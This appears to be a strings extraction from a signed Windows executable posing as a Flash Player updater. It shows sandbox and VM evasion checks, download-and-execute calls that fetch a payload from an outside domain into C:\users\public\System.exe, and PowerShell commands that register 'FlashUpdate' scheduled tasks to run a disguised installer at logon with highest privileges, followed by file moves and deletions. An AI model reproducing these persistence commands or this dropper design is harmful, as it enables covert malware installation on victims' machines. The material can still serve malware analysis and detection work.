!This program cannot be run in DOS mode.
3&G-wG)~wG)~wG)~,/-
}G)~,/*
qG)~,/,
]G)~,/(
~G)~wG(~
~vG)~wG
vG)~RichwG)~
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
H SUVWAVAWH
8A_A^_^][
t$ ATAVAWH
A_A^A\
u0HcH<H
H3E H3E
D8L$0uP
H;xXu5
WATAUAVAWH
A_A^A]A\_
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
d$dD;d$lt^
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
WAVAWH
SVWATAUAWH
L!d$(L!d$@D
D$HL9gXt
A_A]A\_^[
B(I9A(u
SVWATAUAVAWH
A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
u3HcH<H
@USVWATAVAWH
D8d$Xt
A_A^A\_^[]
@USVWATAVAWH
D8d$Xt
A_A^A\_^[]
|$ AVH
D$0H;G
t$ WATAUAVAWH
s(+kPH
A_A^A]A\_
WAVAWH
A_A^_
WAVAWH
A_A^_
x ATAVAWH
A_A^A\
UVWAVAWH
0A_A^_^]
WAVAWH
0A_A^_
t$ WAVAWH
A_A^_
WAVAWH
A_A^_
VWATAVAWH
?D8d$8t
D8d$8t
t'D8d$8t
%D8d$8t
A_A^A\_^
@8l$Ht
WATAUAVAWH
gfffffffH
D8l$ht
A_A^A]A\_
fD9t$b
@UATAUAVAWH
H!T$0D
ue!T$(H!T$
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
u"8Z(t
uF8Z(t
vC8_(t
u"8Z(t
uF8Z(t
vB8_(t
UVWATAUAVAWH
`A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H97u+A
\$ UVWATAUAVAWH
@8|$Ht
@8|$Ht
@8|$Ht
D$XD9x
@8|$ht
@8|$ht
@8|$ht
A_A^A]A\_^]
u"8Z(t
UVWATAUAVAWH
L$&8\$&t,8Y
@A_A^A]A\_^]
fD94Fu
UVWATAUAVAWH
t?H95=P
xWI96tRI
0A_A^A]A\_^]
\$ VWATAUAVH
D!l$xA
@A^A]A\_^
L$ VWAVH
@UATAUAVAWH
e0A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
SUVWATAVAWH
A_A^A\_^][
@USVWATAUAVAWH
D+d$8H
#D8d$`t
A_A^A]A\_^[]
WAVAWH
A_A^_
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
UAVAWH
UVWATAUAVAWH
D8T8>t
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
\$ UVWATAUAVAWH
H!D$ H
`A_A^A]A\_^]
UVWAVAWH
@A_A^_^]
ffffff
fffffff
@USVWATAUAVAWH
e8A_A^A]A\_^[]
USVWAVH
A^_^[]
LcA<E3
u HcA<H
SleepConditionVariableCS
WakeAllConditionVariable
Unknown exception
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CorExitProcess
`h````
xpxxxx
`h`hhh
xwpwpp
(null)
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
AreFileApisANSI
CompareStringEx
GetSystemTimePreciseAsFileTime
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM >cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
SANDBOX
MALTEST
MALWARE
TEQUILABOOMBOOM
powershell.exe -command $taskname = \"FlashUpdate\";$taskdescription = \"Flash_Update\";$action = New-ScheduledTaskAction -Execute 'C:\users\public\videos\flashplayerpp_install.exe' -Argument 'ww' ;$trigger = New-ScheduledTaskTrigger -AtLogon;$TaskUsers = New-ScheduledTaskPrincipal -UserID $env:UserName -RunLevel Highest;Register-ScheduledTask -Action $action -Principal $TaskUsers -Trigger $trigger -TaskName $taskname -Description $taskdescription
powershell.exe -command $taskname = \"FlashUpdateCn\";$taskdescription = \"Flash_Update_Cn\";$action = New-ScheduledTaskAction -Execute 'C:\users\public\downloads\flashplayerpp_install.exe' -Argument 'ww' ;$trigger = New-ScheduledTaskTrigger -AtLogon;$TaskUsers = New-ScheduledTaskPrincipal -UserID $env:UserName -RunLevel Highest;Register-ScheduledTask -Action $action -Principal $TaskUsers -Trigger $trigger -TaskName $taskname -Description $taskdescription
schtasks.exe /tn "FlashUpdateCn" /run
cmd.exe /c del /f C:\users\public\videos\flashplayerpp_install.exe
cmd.exe /c move C:\users\public\flashplayerpp_install.exe C:\users\public\videos\
C:\users\public\System.exe ww
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.tls$ZZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
.rsrc$01
.rsrc$02
HeapFree
SetErrorMode
InitializeCriticalSectionEx
GetSystemDefaultLangID
HeapSize
GetLastError
HeapReAlloc
RaiseException
HeapAlloc
HeapDestroy
DeleteCriticalSection
GetProcessHeap
WinExec
KERNEL32.dll
GetUserNameW
RegOpenKeyExW
ADVAPI32.dll
URLDownloadToFileW
urlmon.dll
IsDebuggerPresent
OutputDebugStringW
EnterCriticalSection
LeaveCriticalSection
CloseHandle
InitializeCriticalSectionAndSpinCount
SetEvent
ResetEvent
WaitForSingleObjectEx
CreateEventW
GetModuleHandleW
GetProcAddress
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
GetStartupInfoW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RtlUnwindEx
SetLastError
EncodePointer
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
RtlPcToFileHeader
ExitProcess
GetModuleHandleExW
GetModuleFileNameW
GetStdHandle
WriteFile
GetCommandLineA
GetCommandLineW
GetFileType
CompareStringW
LCMapStringW
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetStringTypeW
SetFilePointerEx
FlushFileBuffers
GetConsoleCP
GetConsoleMode
CreateFileW
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVtype_info@@
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVCAtlException@ATL@@
.?AUIAtlStringMgr@ATL@@
.?AVCAtlStringMgr@ATL@@
.?AVCWin32Heap@ATL@@
.?AUIAtlMemMgr@ATL@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='highestAvailable' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Greater Manchester1
Salford1
Sectigo Limited1$0"
Sectigo RSA Code Signing CA0
210503000000Z
220503235959Z0`1
Worcester1
OWLNET LIMITED1
OWLNET LIMITED0
https://sectigo.com/CPS0
2http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
2http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
http://ocsp.sectigo.com0
Greater Manchester1
Salford1
Comodo CA Limited1!0
AAA Certificate Services0
190312000000Z
281231235959Z0
New Jersey1
Jersey City1
The USERTRUST Network1.0,
%USERTrust RSA Certification Authority0
2http://crl.comodoca.com/AAACertificateServices.crl04
http://ocsp.comodoca.com0
New Jersey1
Jersey City1
The USERTRUST Network1.0,
%USERTrust RSA Certification Authority0
181102000000Z
301231235959Z0|1
Greater Manchester1
Salford1
Sectigo Limited1$0"
Sectigo RSA Code Signing CA0
iem n'
?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v
3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%
http://ocsp.usertrust.com0
#jYhRB_
mt^Ju~
2&-jWp
Greater Manchester1
Salford1
Sectigo Limited1$0"
Sectigo RSA Code Signing CA
20210624025627Z
DigiCert Inc1
www.digicert.com110/
(DigiCert SHA2 Assured ID Timestamping CA0
210101000000Z
310106000000Z0H1
DigiCert, Inc.1 0
DigiCert Timestamp 20210
http://www.digicert.com/CPS0
,http://crl3.digicert.com/sha2-assured-ts.crl02
,http://crl4.digicert.com/sha2-assured-ts.crl0
http://ocsp.digicert.com0O
Chttp://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
QJxy6z'
dwc_#Ri
DigiCert Inc1
www.digicert.com1$0"
DigiCert Assured ID Root CA0
160107120000Z
310107120000Z0r1
DigiCert Inc1
www.digicert.com110/
(DigiCert SHA2 Assured ID Timestamping CA0
fnVa')
http://ocsp.digicert.com0C
7http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
4http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
https://www.digicert.com/CPS0
8aMbF$
V3"/"6
DigiCert Inc1
www.digicert.com110/
(DigiCert SHA2 Assured ID Timestamping CA
210624025627Z0+
/1(0&0$0"
ERROR : Unable to initialize critical section in CAtlBaseModule
api-ms-win-core-synch-l1-2-0.dll
kernel32.dll
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
(null)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
((((( H
((((( H
(
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
\Applications\VMwareHostOpen.exe
\SOFTWARE\Oracle\VirtualBox Guest Additions
\SOFTWARE\VMware, Inc.\VMware Tools
https://flash.com.se/System.txt?abc=%d
https://flash.com.se/systems.txt?abc=%d
C:\users\public\System.exe
C:\users\public\flashplayerpp_install.exe
C:\users\public\downloads\flashplayerpp_install.exe
https://www.flash.cn/cdm/latest/flashplayerpp_install_cn.exe
C:\users\public\videos\flashplayerpp_install.exe
<<<Obsolete>>